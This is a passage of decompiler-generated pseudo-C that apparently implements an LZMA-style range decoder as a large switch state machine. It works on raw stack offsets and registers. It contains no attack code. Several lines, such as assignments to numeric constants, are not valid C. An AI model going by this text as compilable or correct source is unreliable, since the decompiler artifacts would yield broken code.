                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                      												goto L41;
                                                                      											}
                                                                      										case 7:
                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                      												__eax =  *(__ebp - 0x24);
                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      												__eax =  *(__ebp - 0x28);
                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      												__eax =  *(__ebp - 0x2c);
                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      												__eax = 0;
                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      												__al = __al & 0x000000fd;
                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                      												__eflags = __eax;
                                                                      												 *(__ebp - 0x58) = __eax;
                                                                      												goto L69;
                                                                      											}
                                                                      											__eax =  *(__ebp - 4);
                                                                      											__ecx =  *(__ebp - 0x38);
                                                                      											 *(__ebp - 0x84) = 8;
                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                      											while(1) {
                                                                      												 *(_t613 - 0x54) = _t606;
                                                                      												goto L133;
                                                                      											}
                                                                      										case 8:
                                                                      											goto L0;
                                                                      										case 9:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												goto L89;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x60);
                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                      												goto L171;
                                                                      											}
                                                                      											__eax = 0;
                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                      											__eflags = _t258;
                                                                      											0 | _t258 = _t258 + _t258 + 9;
                                                                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                      											goto L75;
                                                                      										case 0xa:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                      												while(1) {
                                                                      													 *(_t613 - 0x54) = _t606;
                                                                      													goto L133;
                                                                      												}
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x28);
                                                                      											goto L88;
                                                                      										case 0xb:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__ecx =  *(__ebp - 0x24);
                                                                      												__eax =  *(__ebp - 0x20);
                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      											} else {
                                                                      												__eax =  *(__ebp - 0x24);
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x28);
                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      											L88:
                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      											L89:
                                                                      											__eax =  *(__ebp - 4);
                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                      											goto L69;
                                                                      										case 0xc:
                                                                      											L99:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t334 = __ebp - 0x70;
                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t334;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											__eax =  *(__ebp - 0x2c);
                                                                      											goto L101;
                                                                      										case 0xd:
                                                                      											L37:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t122 = __ebp - 0x70;
                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t122;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											L39:
                                                                      											__eax =  *(__ebp - 0x40);
                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                      												goto L48;
                                                                      											}
                                                                      											__eflags = __ebx - 0x100;
                                                                      											if(__ebx >= 0x100) {
                                                                      												goto L54;
                                                                      											}
                                                                      											L41:
                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                      											__ecx =  *(__ebp - 0x58);
                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                      											 *(__ebp - 0x48) = __eax;
                                                                      											__eax = __eax + 1;
                                                                      											__eax = __eax << 8;
                                                                      											__eax = __eax + __ebx;
                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      											__ax =  *__esi;
                                                                      											 *(__ebp - 0x54) = __esi;
                                                                      											__edx = __ax & 0x0000ffff;
                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      												__cx = __ax;
                                                                      												 *(__ebp - 0x40) = 1;
                                                                      												__cx = __ax >> 5;
                                                                      												__eflags = __eax;
                                                                      												__ebx = __ebx + __ebx + 1;
                                                                      												 *__esi = __ax;
                                                                      											} else {
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                      												0x800 = 0x800 - __edx;
                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      												__ebx = __ebx + __ebx;
                                                                      												 *__esi = __cx;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      												goto L39;
                                                                      											} else {
                                                                      												goto L37;
                                                                      											}
                                                                      										case 0xe:
                                                                      											L46:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t156 = __ebp - 0x70;
                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t156;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											while(1) {
                                                                      												L48:
                                                                      												__eflags = __ebx - 0x100;
                                                                      												if(__ebx >= 0x100) {
                                                                      													break;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x58);
                                                                      												__edx = __ebx + __ebx;
                                                                      												__ecx =  *(__ebp - 0x10);
                                                                      												__esi = __edx + __eax;
                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      												__ax =  *__esi;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__edi = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													_t170 = __edx + 1; // 0x1
                                                                      													__ebx = _t170;
                                                                      													__cx = __ax >> 5;
                                                                      													__eflags = __eax;
                                                                      													 *__esi = __ax;
                                                                      												} else {
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edi;
                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													continue;
                                                                      												} else {
                                                                      													goto L46;
                                                                      												}
                                                                      											}
                                                                      											L54:
                                                                      											_t173 = __ebp - 0x34;
                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                      											__eflags =  *_t173;
                                                                      											goto L55;
                                                                      										case 0xf:
                                                                      											L58:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t203 = __ebp - 0x70;
                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t203;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											L60:
                                                                      											__eflags = __ebx - 0x100;
                                                                      											if(__ebx >= 0x100) {
                                                                      												L55:
                                                                      												__al =  *(__ebp - 0x44);
                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                      												goto L56;
                                                                      											}
                                                                      											L61:
                                                                      											__eax =  *(__ebp - 0x58);
                                                                      											__edx = __ebx + __ebx;
                                                                      											__ecx =  *(__ebp - 0x10);
                                                                      											__esi = __edx + __eax;
                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      											__ax =  *__esi;
                                                                      											 *(__ebp - 0x54) = __esi;
                                                                      											__edi = __ax & 0x0000ffff;
                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      												__cx = __ax;
                                                                      												_t217 = __edx + 1; // 0x1
                                                                      												__ebx = _t217;
                                                                      												__cx = __ax >> 5;
                                                                      												__eflags = __eax;
                                                                      												 *__esi = __ax;
                                                                      											} else {
                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                      												0x800 = 0x800 - __edi;
                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      												__ebx = __ebx + __ebx;
                                                                      												 *__esi = __cx;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      												goto L60;
                                                                      											} else {
                                                                      												goto L58;
                                                                      											}
                                                                      										case 0x10:
                                                                      											L109:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t365 = __ebp - 0x70;
                                                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t365;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											goto L111;
                                                                      										case 0x11:
                                                                      											L69:
                                                                      											__esi =  *(__ebp - 0x58);
                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                      											while(1) {
                                                                      												 *(_t613 - 0x54) = _t606;
                                                                      												goto L133;
                                                                      											}
                                                                      										case 0x12:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__eax =  *(__ebp - 0x58);
                                                                      												 *(__ebp - 0x84) = 0x13;
                                                                      												__esi =  *(__ebp - 0x58) + 2;
                                                                      												while(1) {
                                                                      													 *(_t613 - 0x54) = _t606;
                                                                      													goto L133;
                                                                      												}
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x4c);
                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                      											__ecx =  *(__ebp - 0x58);
                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                      											__eflags = __eax;
                                                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                      											goto L130;
                                                                      										case 0x13:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												_t469 = __ebp - 0x58;
                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                      												__eflags =  *_t469;
                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                      												 *(__ebp - 0x40) = 8;
                                                                      												L144:
                                                                      												 *(__ebp - 0x7c) = 0x14;
                                                                      												goto L145;
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x4c);
                                                                      											__ecx =  *(__ebp - 0x58);
                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                      											 *(__ebp - 0x30) = 8;
                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                      											L130:
                                                                      											 *(__ebp - 0x58) = __eax;
                                                                      											 *(__ebp - 0x40) = 3;
                                                                      											goto L144;
                                                                      										case 0x14:
                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                      											__eax =  *(__ebp - 0x80);
                                                                      											 *(_t613 - 0x88) = _t533;
                                                                      											goto L1;
                                                                      										case 0x15:
                                                                      											__eax = 0;
                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      											__al = __al & 0x000000fd;
                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                      											goto L120;
                                                                      										case 0x16:
                                                                      											__eax =  *(__ebp - 0x30);
                                                                      											__eflags = __eax - 4;
                                                                      											if(__eax >= 4) {
                                                                      												_push(3);
                                                                      												_pop(__eax);
                                                                      											}
                                                                      											__ecx =  *(__ebp - 4);
                                                                      											 *(__ebp - 0x40) = 6;
                                                                      											__eax = __eax << 7;
                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                      											 *(__ebp - 0x58) = __eax;
                                                                      											goto L145;
                                                                      										case 0x17:
                                                                      											L145:
                                                                      											__eax =  *(__ebp - 0x40);
                                                                      											 *(__ebp - 0x50) = 1;
                                                                      											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                      											goto L149;
                                                                      										case 0x18:
                                                                      											L146:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t484 = __ebp - 0x70;
                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t484;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											L148:
                                                                      											_t487 = __ebp - 0x48;
                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                      											__eflags =  *_t487;
                                                                      											L149:
                                                                      											__eflags =  *(__ebp - 0x48);
                                                                      											if( *(__ebp - 0x48) <= 0) {
                                                                      												__ecx =  *(__ebp - 0x40);
                                                                      												__ebx =  *(__ebp - 0x50);
                                                                      												0 = 1;
                                                                      												__eax = 1 << __cl;
                                                                      												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                      												__eax =  *(__ebp - 0x7c);
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												while(1) {
                                                                      													 *(_t613 - 0x88) = _t533;
                                                                      													goto L1;
                                                                      												}
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x50);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      											__eax =  *(__ebp - 0x58);
                                                                      											__esi = __edx + __eax;
                                                                      											 *(__ebp - 0x54) = __esi;
                                                                      											__ax =  *__esi;
                                                                      											__edi = __ax & 0x0000ffff;
                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      												__cx = __ax;
                                                                      												__cx = __ax >> 5;
                                                                      												__eax = __eax - __ecx;
                                                                      												__edx = __edx + 1;
                                                                      												__eflags = __edx;
                                                                      												 *__esi = __ax;
                                                                      												 *(__ebp - 0x50) = __edx;
                                                                      											} else {
                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                      												0x800 = 0x800 - __edi;
                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      												 *__esi = __cx;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      												goto L148;
                                                                      											} else {
                                                                      												goto L146;
                                                                      											}
                                                                      										case 0x19:
                                                                      											__eflags = __ebx - 4;
                                                                      											if(__ebx < 4) {
                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                      												L119:
                                                                      												_t393 = __ebp - 0x2c;
                                                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                      												__eflags =  *_t393;
                                                                      												L120:
                                                                      												__eax =  *(__ebp - 0x2c);
                                                                      												__eflags = __eax;
                                                                      												if(__eax == 0) {
                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                      													goto L170;
                                                                      												}
                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                      													goto L171;
                                                                      												}
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                      												__eax =  *(__ebp - 0x30);
                                                                      												_t400 = __ebp - 0x60;
                                                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                      												__eflags =  *_t400;
                                                                      												goto L123;
                                                                      											}
                                                                      											__ecx = __ebx;
                                                                      											__eax = __ebx;
                                                                      											__ecx = __ebx >> 1;
                                                                      											__eax = __ebx & 0x00000001;
                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                      											__al = __al | 0x00000002;
                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                      											__eflags = __ebx - 0xe;
                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                      											if(__ebx >= 0xe) {
                                                                      												__ebx = 0;
                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                      												L102:
                                                                      												__eflags =  *(__ebp - 0x48);
                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                      													__eax = __eax + __ebx;
                                                                      													 *(__ebp - 0x40) = 4;
                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                      													__eflags = __eax;
                                                                      													L108:
                                                                      													__ebx = 0;
                                                                      													 *(__ebp - 0x58) = __eax;
                                                                      													 *(__ebp - 0x50) = 1;
                                                                      													 *(__ebp - 0x44) = 0;
                                                                      													 *(__ebp - 0x48) = 0;
                                                                      													L112:
                                                                      													__eax =  *(__ebp - 0x40);
                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                      														_t391 = __ebp - 0x2c;
                                                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                      														__eflags =  *_t391;
                                                                      														goto L119;
                                                                      													}
                                                                      													__eax =  *(__ebp - 0x50);
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      													__eax =  *(__ebp - 0x58);
                                                                      													__esi = __edi + __eax;
                                                                      													 *(__ebp - 0x54) = __esi;
                                                                      													__ax =  *__esi;
                                                                      													__ecx = __ax & 0x0000ffff;
                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                      														__ecx = 0;
                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                      														__ecx = 1;
                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                      														__ebx = 1;
                                                                      														__ecx =  *(__ebp - 0x48);
                                                                      														__ebx = 1 << __cl;
                                                                      														__ecx = 1 << __cl;
                                                                      														__ebx =  *(__ebp - 0x44);
                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                      														__cx = __ax;
                                                                      														__cx = __ax >> 5;
                                                                      														__eax = __eax - __ecx;
                                                                      														__edi = __edi + 1;
                                                                      														__eflags = __edi;
                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                      														 *__esi = __ax;
                                                                      														 *(__ebp - 0x50) = __edi;
                                                                      													} else {
                                                                      														 *(__ebp - 0x10) = __edx;
                                                                      														0x800 = 0x800 - __ecx;
                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      														 *__esi = __dx;
                                                                      													}
                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      														L111:
                                                                      														_t368 = __ebp - 0x48;
                                                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                      														__eflags =  *_t368;
                                                                      														goto L112;
                                                                      													} else {
                                                                      														goto L109;
                                                                      													}
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0xc);
                                                                      												__ebx = __ebx + __ebx;
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                      													__ecx =  *(__ebp - 0x10);
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      													__ebx = __ebx | 0x00000001;
                                                                      													__eflags = __ebx;
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													L101:
                                                                      													_t338 = __ebp - 0x48;
                                                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                      													__eflags =  *_t338;
                                                                      													goto L102;
                                                                      												} else {
                                                                      													goto L99;
                                                                      												}
                                                                      											}
                                                                      											__edx =  *(__ebp - 4);
                                                                      											__eax = __eax - __ebx;
                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                      											goto L108;
                                                                      										case 0x1a:
                                                                      											L56:
                                                                      											__eflags =  *(__ebp - 0x64);
                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x68);
                                                                      											__al =  *(__ebp - 0x5c);
                                                                      											__edx =  *(__ebp - 8);
                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                      											__ecx =  *(__ebp - 0x14);
                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                      											__eax = __ecx + 1;
                                                                      											__edx = 0;
                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                      											__edx = _t192;
                                                                      											goto L79;
                                                                      										case 0x1b:
                                                                      											L75:
                                                                      											__eflags =  *(__ebp - 0x64);
                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                      												goto L170;
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x14);
                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                      												__eflags = __eax;
                                                                      											}
                                                                      											__edx =  *(__ebp - 8);
                                                                      											__cl =  *(__eax + __edx);
                                                                      											__eax =  *(__ebp - 0x14);
                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                      											 *(__eax + __edx) = __cl;
                                                                      											__eax = __eax + 1;
                                                                      											__edx = 0;
                                                                      											_t274 = __eax %  *(__ebp - 0x74);
                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                      											__edx = _t274;
                                                                      											__eax =  *(__ebp - 0x68);
                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      											_t283 = __ebp - 0x64;
                                                                      											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                      											__eflags =  *_t283;
